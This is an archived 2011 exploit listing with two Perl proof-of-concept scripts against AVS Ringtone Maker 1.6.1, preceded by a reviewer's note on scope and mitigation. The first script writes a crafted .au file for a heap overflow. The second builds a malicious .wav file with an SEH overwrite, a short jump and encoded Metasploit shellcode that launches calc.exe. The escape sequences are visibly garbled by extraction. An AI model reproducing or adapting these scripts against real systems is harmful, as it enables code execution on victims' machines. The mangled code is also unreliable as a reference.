AVS Ringtone Maker 1.6.1 Overflow
Posted on 15 May 2011
# NOTE(review): This listing holds two separate proof-of-concept scripts by the
# same author, run together by the page extraction. Each script only writes a
# crafted media file into the current directory; the fault itself occurs in
# AVS Ringtone Maker 1.6.1 when that file is loaded. The author labels the
# first "(.au) Heap Overflow" and the second "SEH Overflow".
#
# Script 1 writes $AU (a short .au header followed by zero padding) to
# "Ked.au". The handle is opened with ">>" (append), so a re-run grows an
# existing file; hashes of generated samples are therefore not stable
# indicators.
# Script 2 concatenates $junk, $jump, $eip, $seh and $shellcode and writes the
# result to 'KedAns.wav'. According to the author's own comment the payload is
# a Metasploit windows/exec stub with CMD=calc.exe, i.e. a demonstration
# payload.
#
# Scope: the author reports testing on Windows XP SP3 (French) only. The page
# cites no CVE, vendor advisory or fixed version, so affected and fixed
# releases must be confirmed against the vendor's own release notes.
# Mitigation: remove or upgrade the affected version, do not open .au/.wav
# files from untrusted sources in it, and keep OS exploit mitigations
# (DEP, SafeSEH/SEHOP, ASLR) enabled on hosts that must run it.
#
# NOTE(review): The extraction collapsed the listing onto four lines and
# altered its string literals, so as shown it is not valid Perl. Check byte
# values against an authoritative copy before deriving detection content.
# NOTE(review): Both scripts use two-argument open on a bareword handle without
# checking the result, and the second never closes the handle.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #!/usr/bin/perl system("cls"); sub logo(){ print q' 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / KedAns-Dz =-=-=-=-=-=-=-=-=-=-=-| 0 0 Algerian HaCker | | > Site : 1337day.com | 1 1 --------------- |, .-. .-. ,| > Twitter : @kedans | 0 0 | )(_o/ o_)( | > ked-h@hotmail.com | 1 1 |/ / | =-=-=-=-=-=-=-=-=-=-=| 0 0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-IIIIII/-|________________________> 1 1 )_/ / 0 0 (@ `--------` © 2011, Inj3ct0r Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 AVS Ringtone Maker 1.6.1 (.au) Heap Overflow Exploit 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 '; } logo(); # --------- # AVS Ringtone Maker 1.6.1 (.au) Heap Overflow Exploit # Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com> # Tested in Windows XP sp3 Fr # special thanks to : Inj3ct0r Team + exploit-id Team # --------- # Creating The Bad File (.AU) And Opening ... my $AU = "x2Ex73x6Ex64x00x00x01x18x00x00x42xDCx00x00x00x01". "x00x00x1Fx40x00x00x00x00x69x61x70x65x74x75x73x2E". "x61x75x00x20x22x69x61x70x65x74x75x73x2Ex61x75x22". "x00x31x00x00x00x00x00x00x00x00x00x00x00x00x00x00". 
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00". "x00x00x00x00x00x00x00x00x66x66x66x00"; open (FILE,">> Ked.au"); # Bad File Here print FILE $AU; print " [+] File successfully created! "; close (FILE); #!/usr/bin/perl system("cls"); sub logo(){ print q' 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 1 ______ 0 0 .-" "-. 1 1 / KedAns-Dz =-=-=-=-=-=-=-=-=-=-=-| 0 0 Algerian HaCker | | > Site : 1337day.com | 1 1 --------------- |, .-. .-. 
,| > Twitter : @kedans | 0 0 | )(_o/ o_)( | > ked-h@hotmail.com | 1 1 |/ / | =-=-=-=-=-=-=-=-=-=-=| 0 0 (@_ (_ ^^ _) HaCkerS-StreeT-Team 1 1 _ ) \_______\__|IIIIII|__/_______________________ 0 0 (_)@8@8{}<________|-IIIIII/-|________________________> 1 1 )_/ / 0 0 (@ `--------` © 2011, Inj3ct0r Team 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 0 AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit 1 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0 '; } logo(); ### # Title : AVS Ringtone Maker 1.6.1 - SEH Overflow Exploit # Author : KedAns-Dz # E-mail : ked-h@hotmail.com | ked-h@exploit-id.com # Home : HMD/AM (30008/04300) - Algeria -(00213555248701) # Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com # Twitter page : twitter.com/kedans # platform : windows # Tested on : Windows XP sp3 FR ## # Drag And Drop This File to edit Window & Start Upload >> Bo0M CalC ! ### my $junk = "x41" x 4123 ; # Buffer Junk my $jump = "xebx06x90x90"; # Short Jump my $eip = pack("V", 0x00401E3C); # EIP my $seh = pack("V", 0x7C839AC0); # SEH # windows/exec - 511 bytes ( http://www.metasploit.com) # Encoder: x86/alpha_mixed # EXITFUNC=seh, CMD=calc.exe my $shellcode = "xe8x52xe6xffxffx90x90". "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" . "x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" . "x51x51x44x44x44x64x33x36x46x46x46x46x54x58" . "x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" . "x38x39x49x49x49x49x49x49x49x49x49x49x49x49" . "x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" . "x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" . "x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx49" . "x78x4dx59x47x70x43x30x43x30x43x50x4ex69x49" . "x75x46x51x4bx62x42x44x4ex6bx46x32x46x50x4c" . "x4bx43x62x44x4cx4cx4bx42x72x47x64x4ex6bx51" . "x62x51x38x44x4fx4ex57x43x7ax44x66x44x71x4b" . "x4fx45x61x49x50x4cx6cx45x6cx43x51x51x6cx46" . "x62x44x6cx51x30x49x51x48x4fx44x4dx47x71x49" . "x57x4ax42x4cx30x42x72x50x57x4cx4bx51x42x44" . 
"x50x4cx4bx51x52x45x6cx46x61x4ex30x4cx4bx47" . "x30x50x78x4dx55x49x50x42x54x43x7ax43x31x4a" . "x70x42x70x4cx4bx51x58x44x58x4ex6bx50x58x45" . "x70x46x61x4ex33x48x63x45x6cx50x49x4cx4bx44" . "x74x4cx4bx46x61x49x46x46x51x4bx4fx44x71x4f" . "x30x4ex4cx49x51x48x4fx44x4dx43x31x48x47x45" . "x68x49x70x42x55x49x64x43x33x51x6dx49x68x47" . "x4bx43x4dx47x54x51x65x4ax42x51x48x4cx4bx42" . "x78x51x34x47x71x4bx63x50x66x4cx4bx44x4cx50" . "x4bx4cx4bx50x58x47x6cx43x31x4ax73x4cx4bx43" . "x34x4ex6bx45x51x4ax70x4bx39x47x34x51x34x44" . "x64x51x4bx43x6bx43x51x46x39x50x5ax42x71x4b" . "x4fx4bx50x51x48x43x6fx42x7ax4ex6bx45x42x4a" . "x4bx4fx76x51x4dx50x6ax46x61x4cx4dx4fx75x48" . "x39x43x30x43x30x45x50x42x70x50x68x46x51x4e" . "x6bx42x4fx4ex67x49x6fx4ax75x4dx6bx49x6ex44" . "x4ex46x52x4ax4ax51x78x4ex46x4ax35x4dx6dx4f" . "x6dx49x6fx4ax75x45x6cx46x66x51x6cx44x4ax4f" . "x70x49x6bx49x70x42x55x46x65x4fx4bx50x47x45" . "x43x51x62x42x4fx43x5ax43x30x42x73x49x6fx4e" . "x35x42x43x45x31x50x6cx51x73x44x6ex43x55x51" . "x68x50x65x47x70x41x41"; my $exploit = $junk.$jump.$eip.$seh.$shellcode; open (FILE ,'> KedAns.wav'); print FILE $exploit; #================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== # Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu # gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... # Exploit-Id Team : jos_ali_joe + Caddy-Dz + kaMtiEz (exploit-id.com) ...All * TreX (hotturks.org) # (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org) # www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ... #================================================================================================
